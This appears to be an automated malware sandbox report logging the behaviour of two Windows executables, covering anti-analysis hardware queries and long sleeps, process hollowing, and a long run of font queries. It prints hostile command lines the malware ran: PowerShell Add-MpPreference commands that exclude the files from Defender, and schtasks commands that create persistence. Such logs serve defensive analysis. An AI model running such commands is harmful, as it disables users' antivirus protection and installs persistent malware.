                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara matchFile source: Process Memory Space: PZNfhfaj9O.exe PID: 7148, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CiENBY.exe PID: 7296, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Memory allocated: 2C90000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Memory allocated: 2D50000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Memory allocated: 4D50000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Memory allocated: 7D80000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Memory allocated: 8D80000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Memory allocated: 8F40000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Memory allocated: 9F40000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Memory allocated: 1400000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Memory allocated: 2F90000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Memory allocated: 2E20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Memory allocated: 1370000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Memory allocated: 2E00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Memory allocated: 4E00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Memory allocated: 7800000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Memory allocated: 8800000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Memory allocated: 89A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Memory allocated: 99A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Memory allocated: 2630000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Memory allocated: 2840000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Memory allocated: 2660000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7641
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7727
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 355
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Window / User API: threadDelayed 3698
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Window / User API: threadDelayed 3203
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Window / User API: threadDelayed 2121
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Window / User API: threadDelayed 5579
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe TID: 6288 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5956 Thread sleep count: 7641 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7288 Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep count: 241 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1860 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7304 Thread sleep time: -7378697629483816s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe TID: 7644 Thread sleep time: -23980767295822402s >= -30000s
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe TID: 7332 Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe TID: 7272 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe TID: 7360 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe TID: 7952 Thread sleep time: -25825441703193356s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe TID: 7836 Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe TID: 7800 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1973680913.00000000011CD000.00000004.00000020.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2078146941.0000000000A11000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe"
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\CiENBY.exe"
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe"
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\CiENBY.exe"
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Memory written: C:\Users\user\Desktop\PZNfhfaj9O.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Memory written: C:\Users\user\AppData\Roaming\CiENBY.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe"
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\CiENBY.exe"
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp3010.tmp"
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Process created: C:\Users\user\Desktop\PZNfhfaj9O.exe "C:\Users\user\Desktop\PZNfhfaj9O.exe"
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Process created: C:\Users\user\Desktop\PZNfhfaj9O.exe "C:\Users\user\Desktop\PZNfhfaj9O.exe"
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp5461.tmp"
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Process created: C:\Users\user\AppData\Roaming\CiENBY.exe "C:\Users\user\AppData\Roaming\CiENBY.exe"
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Users\user\Desktop\PZNfhfaj9O.exe VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
